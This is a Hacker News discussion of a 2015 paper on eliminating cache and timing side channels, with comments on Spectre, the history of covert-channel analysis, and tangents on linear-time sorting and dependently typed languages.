Hacker News new | past | comments | ask | show | jobs | submit login
Robust and Efficient Elimination of Cache and Timing Side Channels (2015) (arxiv.org)
55 points by KirinDave on Jan 6, 2018 | hide | past | favorite | 22 comments



This seems to require user input

"In our solution, developers annotate the functions perform- ing sensitive computation(s) that they would like to protect."

and assumes that the cache timing is used to gather info on a secret function, so it does not consider the usecase of dumping everything a process can see?


Their performance results depend on isolating “protected” functions that access sensitive data, while keeping the rest of the code unprotected. That’s fine in a sane world, but with Spectre, just about any code can be tricked into speculatively accessing sensitive data in its address space. So trying to adapt this into a Spectre mitigation reduces to just flushing all CPU caches on every context switch (plus giving each core a separate chunk of the L3 cache, which is supposed to be shared). That would be… not pretty, from a performance standpoint.


Consider though: a similar logic has lead us to not flush the cache, and here we are.

Until we have better ways of reasoning about and restricting the code we are running, it isn't going to get prettier. Conservative approaches like this may not be best for every propose, but in hardened code like a hypervisor it might make sense.


Isn't the problem rather that we have instructions to control the cache at all? As far as my research goes, things like CLFLUSH were introduced at the same time as SSE2, which was what, the Pentium III era? We were apparently doing fine without them before that, even with 4+ CPU systems.

I'm currently trying to get the spectre.c PoC to work without using CLFLUSH or similar, but it doesn't look too promising yet. Then again, I only started an hour ago and lack the ability to think in those creative and twisted ways that lead to the discovery of this whole issue in the first place.


> We were apparently doing fine without them before that

well, feel free to return to using pentium2-like CPUs


This reads as if a poisoned CPU cache can indeed leak secrets and has been known for many years now? Am I reading that right?


Practical secret extraction from caches --- practical as in "papers documented C programs the authors wrote to verify their claims" --- go back to at least 2005.

Here's a very well-known paper: https://www.cs.tau.ac.il/~tromer/papers/cache.pdf

It's the speculative execution side channel that's new. What we didn't fully grok was the idea that code that never really runs could leave predictable cache footprints.


It's so obvious now, in retrospect :(


and that you can poison prediction state (branch predictor / branch target buffer etc) and cache state to force longer periods of processor speculation, leaving more room for unintended side effects.


The folks that invented high-assurance security (TCSEC A1-class) were eliminating storage and timing channels best they could. An early reference was in VAX Security Kernel that tried to assess and mitigate timing channels.

http://ix.cs.uoregon.edu/~butler/teaching/10F/cis607/papers/...

http://ieeexplore.ieee.org/document/213271/

Mainstream security professionals have always ignored such work dismissing it as red tape with no value or too costly. The early work preempted most problems, though, back in the 1980's-1990's by focusing on root causes. The same crowd that ignores them keep rediscovering the lessons in new forms while continuing to ignore them. (There are exceptions who pay attention.) Far as covert channels, the first technique I saw to systematically examine was Kemmerer's in 1983. It was one that made it into the first criteria for security certification. As in, it was mandatory to look for covert/side channels the best you could.

http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.462...

https://fas.org/irp/nsa/rainbow/tg030.htm

So, the basic concepts have been known for decades under covert, channel analysis. The analysis technique established long ago was to identify every shared resource between two things in the system. If they could read/write to it, it was a potential, storage channel. It was a timing channel if they can manipulate its activity with a way to time that. Those are basic ones. So, you can just list everything, categorize them, and do the analysis by brute force. They'd have found the caching stuff quickly. Here's an example that should've happened a long time ago:

https://eprint.iacr.org/2016/613.pdf


Even longer.

What's really wild is that they even got the rough proportion of security cost for losing it down to 5% of the numbers were seeing with today's security patches.

I submitted this because I think their technique is preferred for lots of stuff distributed systems developers do with crypto primitives (as opposed to retpoline).

There are lots of well-known things no one seems to know outside of Academia, like how generalized sorting is O(n) and compilers that can prove the correctness of real world code when it's written a specific way


what's interesting to me about this paper is how many different things they had to worry about. Disable scheduling, pin to a single core, page coloring, no huge pages, disable hyperthreading, disabling frequency scaling, and lastly the lazy cleanup (I think that's all?). it's a pretty long list of kernel modifications and configuration, and I doubt these will ever be defaults.


> generalized sorting is O(n)

What do you mean by generalized sorting and how isn't this affected by the comparison sorting lower bound?

Do you have a source?


They probably mean the "postman sort", or whatever catchy name it goes by (radix sort, IIRC). That doesn't involve any comparisons between elements to be sorted. Think of how a postman sorts mail into P.O. boxes... you just algorithmically map a number to a row and column (bin), and deliver. This truly is O(N), but there's a catch: it doesn't work when you don't have bins to sort into, or when you don't know even how many bins you'll need. If you try to generalize this it becomes O(N log N).


Well... Actually. No. First of all, radix sort uses structural features to arrive at linear time, it doesn't incomplrtely sort the input.

Secondly, I've tried to get the white paper exposed here and it generally goes over like a lead balloon but:

http://www.diku.dk/hjemmesider/ansatte/henglein/papers/hengl...

Is the technique. It's an imposing 80 page paper even dedicated educators like Edward Kmett has trouble explaining trivially, but there is a talk here by the author to help sum it up: https://www.youtube.com/watch?v=sz9ZlZIRDAg

We've had some of Henglein's associates here to talk about it, too.

There is a Haskell implementation and it can really speed up certain types of operations. It's tricky to get the constants low in Haskell, but Kmett seems to have done a pretty good job.


Please see my comment below.


Could you share some more information about generalized sorting in O(n)? Are you talking about algorithms like radix sort?



> compilers that can prove the correctness of real world code when it's written a specific way

Do you have something I can read? I'm curious specifically what you mean by this.


Agda and Idris are languages with more "real world" applications that can validate totality and offer proofs.

It's pretty cool because you can essentially ad hoc extend the type system to understand all transitions valid for types, then prove then.

Idris is different from Agda in that it has great introducory literature (the Idris book is just fantastic) and it also has F# style type providers that let you do things like query the AWS API with a given account's creds then extend the type system with a series of descriptive types for all valid operations for every asset.

It means that you can (and I find this really surprising) assert code totality on very real world use cases like code that orchestrates containers, binary parsers, or network protocols.

I spent my Christmas break studying Idris and what really delighted me most was that in many cases systems like that end up being simpler to use (even though their "Verified" constructions often involve simple inductive proofs to the compiler. You don't have to prove everything, but things that are proven are safe to use


I'm familiar with dependently typed languages, I thought you might mean something different than semi-manual theorem proving. For instance, writing your program in a particular style that could maximally take advantage of automated SMT solving in LiquidHaskell or something.


Cache as a channel: SSH over cache: https://www.youtube.com/watch?v=a9sGk7FtnYk




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: